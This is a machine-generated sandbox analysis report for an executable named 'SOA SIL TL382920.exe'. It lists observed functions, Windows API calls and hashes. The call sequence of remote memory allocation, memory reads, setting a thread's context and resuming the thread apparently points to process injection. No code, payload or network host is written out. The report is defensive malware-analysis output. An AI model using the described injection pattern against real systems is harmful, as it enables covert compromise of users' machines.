Function 0157F059 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157F112

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 26791ec4fc5da27e3d44bcae8bf9cf70b7f66d82ce7410faed3f37c9a3f7eadd
Instruction ID: a8c63ac1d0d448a58acd05be1aa2dbd0aca7fe5c5e5d89d6fc319db14f457327
Opcode Fuzzy Hash: 26791ec4fc5da27e3d44bcae8bf9cf70b7f66d82ce7410faed3f37c9a3f7eadd
Instruction Fuzzy Hash: B941ABB5D002589FDF10CFA9E984AEEFBB1BF49310F10942AE815BB240D775A945CF64

Function 0157F060 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157F112

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 592df24411ee25bf9c30516980120fc07e0d4f8c7cf34fcfe31cf170929d1e0e
Instruction ID: f23914e91d76173434dda287beec46b6351eaa83cbd6d3a282b0f7146b788378
Opcode Fuzzy Hash: 592df24411ee25bf9c30516980120fc07e0d4f8c7cf34fcfe31cf170929d1e0e
Instruction Fuzzy Hash: D841ABB5D002589FDF10CFA9E984AEEFBB1BF49310F10942AE815BB200D775A945CF64

Function 0157EDD8 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0157EE82

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: eec08d4898556e64c55ef1a526eba13bcfc65bc6cccfb6acae7f69e7d5e9bfe8
Instruction ID: e2e27ab012de69f909426bda1dc32db8cd8ca3f34cbcee8a5c0c918d3402aeaa
Opcode Fuzzy Hash: eec08d4898556e64c55ef1a526eba13bcfc65bc6cccfb6acae7f69e7d5e9bfe8
Instruction Fuzzy Hash: BC41A8B4D002589FDF10CFA9D984AAEFBB1FB49310F10942AE814BB200D735A945CFA4

Function 0157EDD0 Relevance: 1.6, APIs: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0157EE82

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e582254f5dbe5cac97b3530e90e13eb80eef3654068d2bc0e763da92638c4ead
Instruction ID: aef61db58dd3b6d6060c5c4a40756061e374b4adece0ebfbe4e7b452ebe6e26b
Opcode Fuzzy Hash: e582254f5dbe5cac97b3530e90e13eb80eef3654068d2bc0e763da92638c4ead
Instruction Fuzzy Hash: 2D41A9B9D002589FDF10CFA9D985AEEFBB1BF09310F10981AE814BB210D735A945CF64

Function 0157E869 Relevance: 1.6, APIs: 1, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0157E91F

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1e05f7423285ae61fb1fa0a832a7a766fdf356f09eb966dff77865f7decaf718
Instruction ID: 72196e45acf4c522e5781f9e328e985a128009447548e6a69ad9e355219b8da6
Opcode Fuzzy Hash: 1e05f7423285ae61fb1fa0a832a7a766fdf356f09eb966dff77865f7decaf718
Instruction Fuzzy Hash: 3441DCB5D002589FDF10CFA9D985AEEFBF1BB49314F14842AE418BB240D739A989CF54

Function 0157E870 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0157E91F

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e829c282122ccc94fc0714791be3a60b6e3719d56b41c97ac7903eb6f4df3712
Instruction ID: d80b831a0d24bb789172df090f900f9139423cd36ee40e0189502e110725b3e2
Opcode Fuzzy Hash: e829c282122ccc94fc0714791be3a60b6e3719d56b41c97ac7903eb6f4df3712
Instruction Fuzzy Hash: B441DCB5D002589FDB10CFA9D985AEEFBF1BB48310F14802AE418BB200D739A985CF54

Function 0157E341 Relevance: 1.6, APIs: 1, Instructions: 77
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0157E3C6

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 591b2ed637fda0f81be9c50b1524c4d0ce9787cf5c989b131ed6255245e21536
Instruction ID: 77e12fd269234ee35b97450ecbdf0b208eece1d0f055850cc42d94a12952ea21
Opcode Fuzzy Hash: 591b2ed637fda0f81be9c50b1524c4d0ce9787cf5c989b131ed6255245e21536
Instruction Fuzzy Hash: D131C9B4D002189FDF14CFA9E985AAEFBB1BB49314F10942AE818B7200D735A945CFA4

Function 0157E348 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0157E3C6

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f4b3dbe73a0d641c1fd17afa73f0baa6db1221baef61c98f2fc7235f1f318a5f
Instruction ID: 37929ab81706fd875c2ceacaff337080da2fed0c21036e098abbb394e613326b
Opcode Fuzzy Hash: f4b3dbe73a0d641c1fd17afa73f0baa6db1221baef61c98f2fc7235f1f318a5f
Instruction Fuzzy Hash: DE31D9B4D002189FDF10CFA9E985A9EFBB1BB49310F10842AE818B7200D735A941CFA4

Function 0152D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976505824.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0378fa9e4dc821efae58a15bdb6071de38100d810440466ab4281d4666874b5
Instruction ID: 15d33bc477609a097f5d80581a5be76c55cd6d0531245991c190df3779f79c59
Opcode Fuzzy Hash: a0378fa9e4dc821efae58a15bdb6071de38100d810440466ab4281d4666874b5
Instruction Fuzzy Hash: F3210772604300DFDB05DF94D9C0B26BBB5FB86324F24C9ADE8494F282C736D446CA61

Function 0152D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976505824.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7057473ba3d181ea280b9b484356da63c0a6e09167e2d393679b177400539d0
Instruction ID: b8a7fb7e0b5e75c39e03219d2df5aab7bb6fef36d276c82f3b7d667f6ae046c7
Opcode Fuzzy Hash: c7057473ba3d181ea280b9b484356da63c0a6e09167e2d393679b177400539d0
Instruction Fuzzy Hash: 35212576604340DFDB15DF54D8C0B26BBB5FB85314F24C969E8490F292D33BD446CA61

Function 0152D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976505824.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fcdbc0d1b1ea78a4e75af8259d4315f709db448373d8073229f6aba82c67377
Instruction ID: 97846e9b96dd0c3c8f98ba2f6287b3b0525f36657a3baa911871a35f800104fa
Opcode Fuzzy Hash: 1fcdbc0d1b1ea78a4e75af8259d4315f709db448373d8073229f6aba82c67377
Instruction Fuzzy Hash: D82192765093808FCB13CF64D994B15BF71FB46214F28C5DAD8498F6A7C33A980ACB62

Function 0152D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976505824.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_152d000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c135fb6bef3166fd7f15c3dba2e705daa82867439b28bd93e44349696fb42149
Instruction ID: 216b5ec2db2945706f0fd5633f423ca8e67c5bcfb018abaf8679403791fc66f6
Opcode Fuzzy Hash: c135fb6bef3166fd7f15c3dba2e705daa82867439b28bd93e44349696fb42149
Instruction Fuzzy Hash: 96118B76504280DFDB12CF54D5C4B19FBB2FB86324F28C6A9D8494F696C33AD44ACB62

Non-executed Functions

Function 0157C290 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8355cacab13e85c984065d6b7059bb2341347c7a4719ca2c52d8994bde04a08
Instruction ID: 712e932f4cb91c5042cc075f351ce0734e97ae8839362ccca601dfcb1aea59ce
Opcode Fuzzy Hash: e8355cacab13e85c984065d6b7059bb2341347c7a4719ca2c52d8994bde04a08
Instruction Fuzzy Hash: 86E107B4E1021A8FDB14CFA9D581AADBBF2FF89301F248169D514AB316DB35AD41CF60

Function 0157E438 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec277388723152ab0c7e764acf81197a9667ed4ec7f63bb7a1cccbb7169ac564
Instruction ID: fe03888df323560e9a6ead070d8564c4ae543a895331f0e8ba91b1c86c5e77f9
Opcode Fuzzy Hash: ec277388723152ab0c7e764acf81197a9667ed4ec7f63bb7a1cccbb7169ac564
Instruction Fuzzy Hash: 69E11574E102198FDB14CFA9D581AAEBBF2FF89301F2481A9D514AB356DB30AD41CF60

Function 0157E9A0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0466c0a7c4ccafd7319e8cdecd061a3aaf6ab61a14f03f64911809b69f9f2d78
Instruction ID: 2949077548ca15894a71ed1816a12429401316b053da466fc2c7841a642cb1e7
Opcode Fuzzy Hash: 0466c0a7c4ccafd7319e8cdecd061a3aaf6ab61a14f03f64911809b69f9f2d78
Instruction Fuzzy Hash: 16E10574E102198FDB14CFA9D581AAEBBF2FF89301F2481A9D514AB356DB34AD41CF60

Function 0157DA90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f76db53412ee2ea20d32a5f86002dd3ae5958b1ffa582c3476719fc622e5775
Instruction ID: a30b48632ae65cd9a1d8ced87a6302b7a05869bbbf479f4a87fc2f4f22022a75
Opcode Fuzzy Hash: 4f76db53412ee2ea20d32a5f86002dd3ae5958b1ffa582c3476719fc622e5775
Instruction Fuzzy Hash: 62E105B4E102198FDB14CFA9D580AAEBBF2FF89301F248169D914AB316D735AD41CF60

Function 0157BE58 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc388849ebe1dab6882b07538b4ad376d04572b99d4f63599b0d662aca5cb366
Instruction ID: 7f6f7d9c580d3a60631575319476f65281fa0e82e1134fba54b2e3582b9942b0
Opcode Fuzzy Hash: cc388849ebe1dab6882b07538b4ad376d04572b99d4f63599b0d662aca5cb366
Instruction Fuzzy Hash: 2BE10874E1021A8FDB14CFA9D581AAEBBF2FF89301F248169D514AB316D735AD41CFA0

Function 0157C281 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb9c76caf728a1940ccbc90578d59af5733823138e40669c3f45fa9a5bddb5a
Instruction ID: 1e9dfd584e9fedffb55465387237b2ace5810a16cb48b437f40c3ad786eb4f2b
Opcode Fuzzy Hash: edb9c76caf728a1940ccbc90578d59af5733823138e40669c3f45fa9a5bddb5a
Instruction Fuzzy Hash: 93510774E1021A8FDB14CFA9D9815AEBBF2FF89301F248169D518AB216D7349A41CFA1

Analysis Process: SOA SIL TL382920.exePID: 7908, Parent PID: 7820COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	5.2%
Signature Coverage:	9.1%
Total number of Nodes:	154
Total number of Limit Nodes:	13

Executed Functions

Function 00417473 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174E5

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 52126dae7faad31c04decbc127e23bf898b39b7fd04cf1b34f2b8976ffd50565
Instruction ID: d0d4f872bbfbd303d99afe2d3f76877363c48562fdc16c1b597a2a2afd1d56d4
Opcode Fuzzy Hash: 52126dae7faad31c04decbc127e23bf898b39b7fd04cf1b34f2b8976ffd50565
Instruction Fuzzy Hash: FC015EB1E0020DABDB10DAA1DC42FDEB7B89B54308F4081AAE90897241F635EB588B95

Function 0042C303 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C337

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: bd86089259d6e5875f4503909de52df89b4bed81ab109686b9406468e690c746
Instruction ID: 4f9f0b6843727175d19f8e88582730f826fa7f04181e02de9b26f8e5de11b647
Opcode Fuzzy Hash: bd86089259d6e5875f4503909de52df89b4bed81ab109686b9406468e690c746
Instruction Fuzzy Hash: 3FE086362502187BD620FE5ADC41FD7775DEFC5714F40841AFA08A7141CAB5B90187F5

Function 01872B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01872B9A

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c829a32246ba44d91c9245ca22168bc7fd2002e43caa62a7e6fb2f3d3e8d3168
Instruction ID: 5291171b764f64a67f1af3f5588ca7cf3f2d87dbd6aa4de8537d10691f055c71
Opcode Fuzzy Hash: c829a32246ba44d91c9245ca22168bc7fd2002e43caa62a7e6fb2f3d3e8d3168
Instruction Fuzzy Hash: C490023121108842D5107258950474A100597D1301F95C815A5418658DC6A589957121

Function 01872BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01872BCA

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8044d6d7f696bd493b6b72796f1db3436b1f041c8bf6b30078b911f62e2b707c
Instruction ID: 54c45e1634a2dcb515c5f0084ea1c4f36f0c918ddb971e94ffb9d99f9629625a
Opcode Fuzzy Hash: 8044d6d7f696bd493b6b72796f1db3436b1f041c8bf6b30078b911f62e2b707c
Instruction Fuzzy Hash: 5390023121100442D50076986508646100597E1301F91D415A6018555EC67589957131

Function 01872A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01872A8A

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce0bffd48b966c774255b4d2d1fa5483112173bc3048a2877b25bd86d2d6d629
Instruction ID: ef9a0a87fb9e797e55ab80605894973bc2c4e472d2eaf3a0f10b5e20e374a886
Opcode Fuzzy Hash: ce0bffd48b966c774255b4d2d1fa5483112173bc3048a2877b25bd86d2d6d629
Instruction Fuzzy Hash: 2990026121200043450572585514616500A97E1301B91C425E2008590DC53589957125

Function 01872D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01872D1A

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf6720b09aed655f0068719566f55e5605b2b23eae0733d0d3b909546bcc776
Instruction ID: 4b44a64ed572eff5903cbb5f924db6aa195f03c2a3523f1399476e6740397863
Opcode Fuzzy Hash: 5cf6720b09aed655f0068719566f55e5605b2b23eae0733d0d3b909546bcc776
Instruction Fuzzy Hash: A090023121100453D51172585604707100997D1341FD1C816A1418558DD6668A56B121

Function 018734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018734EA

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81d7c68a70bd766e35090f6039a161cabe9073bf9460114a2d5e27a6b2bf12d4
Instruction ID: c2bd578df72bbe765bf43a10d44c7a693f7f816a7acc52ccc0c9b84c75aac396
Opcode Fuzzy Hash: 81d7c68a70bd766e35090f6039a161cabe9073bf9460114a2d5e27a6b2bf12d4
Instruction Fuzzy Hash: 6A90023161510442D50072585614706200597D1301FA1C815A1418568DC7A58A5575A2

Function 01872EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01872EBA

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e30d911bfb13d19d76ad28f9bfa3a83d82056fcf9011b56d0c877914523c0fa5
Instruction ID: c499a64325bdc7f7dac93768c83a0f0063e00d1f43fb83701afc48e9b4918dcb
Opcode Fuzzy Hash: e30d911bfb13d19d76ad28f9bfa3a83d82056fcf9011b56d0c877914523c0fa5
Instruction Fuzzy Hash: D090043131140443D500735C5D1470F1005D7D1303FD1C415F315C555DC735CD557571

Function 00413C24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(59F79305l7,00000111,00000000,00000000), ref: 00413D10

Strings

59F79305l7, xrefs: 00413D17, 00413D1A
59F79305l7, xrefs: 00413D03, 00413D0F, 00413D20

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 59F79305l7$59F79305l7
API String ID: 1836367815-429775361
Opcode ID: 619c753af0c9bcca1589a784ee93aed817c9b2f634dd5a8ec5778640a07a9ad2
Instruction ID: 71195fd206493224188ff3eb005745a2ea8c9fdfbb31a98b0f102e63003a0fd1
Opcode Fuzzy Hash: 619c753af0c9bcca1589a784ee93aed817c9b2f634dd5a8ec5778640a07a9ad2
Instruction Fuzzy Hash: 0B21EE36D08298A6DB128F35EC42BDEBB74DF42B04F0441DAEA812F282D6651607CBD5

Function 00413C8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(59F79305l7,00000111,00000000,00000000), ref: 00413D10

Strings

59F79305l7, xrefs: 00413D17, 00413D1A
59F79305l7, xrefs: 00413D03, 00413D0F, 00413D20

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 59F79305l7$59F79305l7
API String ID: 1836367815-429775361
Opcode ID: 0ad69c98f6d4faa7fab82c640d9cde88956c92a02869955c43c6efe57d0be63d
Instruction ID: 08b21e53fd59b384ccb59453ad20b7b1f8d1318e543d1738fabc2f0e0438a20d
Opcode Fuzzy Hash: 0ad69c98f6d4faa7fab82c640d9cde88956c92a02869955c43c6efe57d0be63d
Instruction Fuzzy Hash: 1811EB71E0035879EB10EBA19C02FDF7B789F45B14F048155F9147A2C1E6BC5B058BDA

Function 00413C93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(59F79305l7,00000111,00000000,00000000), ref: 00413D10

Strings

59F79305l7, xrefs: 00413D17, 00413D1A
59F79305l7, xrefs: 00413D03, 00413D0F, 00413D20

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 59F79305l7$59F79305l7
API String ID: 1836367815-429775361
Opcode ID: 8d4da016924dda4a8a385b019675b0a9295f069ea42c9e1b261abb20b67d8802
Instruction ID: 084cf16ab77ded0dd1bc70643ed90a81b63404af89959a49b1908bb553d275cf
Opcode Fuzzy Hash: 8d4da016924dda4a8a385b019675b0a9295f069ea42c9e1b261abb20b67d8802
Instruction Fuzzy Hash: A601DB71E4035876EB10AB919C02FDF7B7C9F41B54F048055FA047B2C1E6B857068BE9

Function 004174F3 Relevance: 1.6, APIs: 1, Instructions: 134
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174E5

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 7c517d178d7007ee99312d50ed5bccb8a3f1b725f9d2c31633041e2592002b56
Instruction ID: f931f9d862489e5a57b838b22117c1fa0e12fd18252a165208f0122d9ecdea77
Opcode Fuzzy Hash: 7c517d178d7007ee99312d50ed5bccb8a3f1b725f9d2c31633041e2592002b56
Instruction Fuzzy Hash: F7419D72A0C2867BCB12DB34CC91ADABF759B02258F1843DDF5988B693D2349549C395

Function 0042C673 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,88558D00,00000007,00000000,00000004,00000000,00416CF8,000000F4), ref: 0042C6B2

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5b7ec1997cc7bba348007fb009d34e34bc61468facd6fd55fdfdc7a5d4fd4893
Instruction ID: 981bcd8a93e5c7d96da6fd6fc87b500a48271dc180729be57afcfd2d4f9e0909
Opcode Fuzzy Hash: 5b7ec1997cc7bba348007fb009d34e34bc61468facd6fd55fdfdc7a5d4fd4893
Instruction Fuzzy Hash: EDE06D712042147BD610EE59EC85FEB37ACEFC5714F004419FA08A7241C670B9118BB9

Function 0042C623 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E24E,?,?,00000000,?,0041E24E,?,?,?), ref: 0042C65F

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4ee5dae06c8b689ecf407c44e84c784f67acb8431ce06ff937e2f2b9fcb55efe
Instruction ID: 5448fc10258d4d570953b4680de73db897307320b18f9cd148b89a2648b04ad7
Opcode Fuzzy Hash: 4ee5dae06c8b689ecf407c44e84c784f67acb8431ce06ff937e2f2b9fcb55efe
